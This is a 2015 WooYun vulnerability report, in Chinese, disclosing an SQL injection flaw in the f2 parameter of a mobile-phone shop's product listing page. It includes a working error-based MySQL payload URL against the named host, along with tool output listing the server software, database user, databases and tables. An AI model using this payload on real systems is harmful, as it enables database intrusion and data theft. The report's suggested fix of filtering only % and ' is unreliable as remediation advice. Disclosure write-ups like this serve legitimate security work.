当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104289

漏洞标题:丫丫手机商城sql注入一枚

相关厂商:yaya888.com

漏洞作者: 风之传说

提交时间:2015-03-30 12:49

修复时间:2015-05-14 12:58

公开时间:2015-05-14 12:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

丫丫手机商城sql注入一枚

详细说明:

http://mtest.yaya888.com/list.php?cat=1&id=62&f2=&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8


搜索型sql注入一枚,存在注入的参数 f2=

Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://mtest.yaya888.com:80/list.php?cat=1&id=62&f2=%' AND (SELECT
1417 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (CASE WHEN (1417=1417) THE
N 1 ELSE 0 END)),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACT
ER_SETS GROUP BY x)a) and '%'='&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9
B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8
%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8
---
[21:20:15] [INFO] testing MySQL
[21:20:15] [WARNING] reflective value(s) found and filtering out
[21:20:15] [INFO] confirming MySQL
[21:20:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.0
[21:20:15] [INFO] fetching current user
[21:20:15] [INFO] retrieved: yaya_cdb_pc@%
current user: 'yaya_cdb_pc@%'


available databases [10]:
[*] baobao
[*] information_schema
[*] kmyaya
[*] kmyaya6
[*] kmyaya_bak
[*] kmyaya_bak2
[*] kmyaya_bak3
[*] mysql
[*] test
[*] yaya_appapi


看下是不是你们的数据库。。

Database: kmyaya6
[98 tables]
+------------------------+
| coupon_con |
| coupon_stuff |
| coupon_verify |
| coupon_visits |
| game_cd_gift |
| game_cd_user |
| game_zhuanpan_gift |
| game_zhuanpan_gift_bak |
| game_zhuanpan_open |
| game_zhuanpan_open_bak |
| game_zhuanpan_pici |
| game_zhuanpan_user |
| game_zhuanpan_user_bak |
| lottery |
| lottery_activity |
| lottery_log |
| oa_active_log |
| oa_active_order |
| oa_article |
| oa_backvisit |
| oa_computer |
| oa_customer |
| oa_customer_log |
| oa_customer_score_log |
| oa_document |
| oa_ip |
| oa_iplogin |
| oa_modlist |
| oa_money_class |
| oa_money_detail |
| oa_offer_code |
| oa_offer_event |
| oa_offer_task |
| oa_personnel_files |
| oa_qwgh |
| oa_reset |
| oa_service |
| oa_set_depart |
| oa_set_member_rank |
| oa_set_parameter |
| oa_set_shop |
| oa_stock |
| oa_stock_archive |
| oa_stock_booking |
| oa_stock_detail |
| oa_stock_inventory |
| oa_stock_move |
| oa_url |
| oa_user |
| oa_user_log |
| oa_user_login |
| oa_usergroup |
| oa_wx_status |
| sms_sended |
| sms_sending |
| sms_tpl |
| sms_user |
| sys_actgoods |
| sys_ad |
| sys_ad_position |
| sys_address |
| sys_admin |
| sys_admin_log |
| sys_admin_login |
| sys_ads |
| sys_advertisement |
| sys_app_fenlei |
| sys_article |
| sys_article_cat |
| sys_bai_nian |
| sys_brand |
| sys_brands |
| sys_byself |
| sys_cart |
| sys_cart_detail |
| sys_client_company |
| sys_client_phone |
| sys_client_question |
| sys_client_records |
| sys_codesend |
| sys_comment |
| sys_contract |
| sys_contract_a |
| sys_contract_config |
| sys_cprice |
| sys_cup_comment |
| sys_cup_match |
| sys_cup_taking |
| sys_district |
| sys_friend_link |
| sys_friendlink |
| sys_game_batch |
| sys_game_gift |
| sys_game_open |
| sys_game_order |
| sys_game_type |
| sys_game_user |
| sys_goods |
+------------------------+


看下是不是你么的表。。。

漏洞证明:

如上

修复方案:

过滤 % 和 ' 就可以了。。

版权声明:转载请注明来源 风之传说@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-30 12:57

厂商回复:

非常谢谢

最新状态:

暂无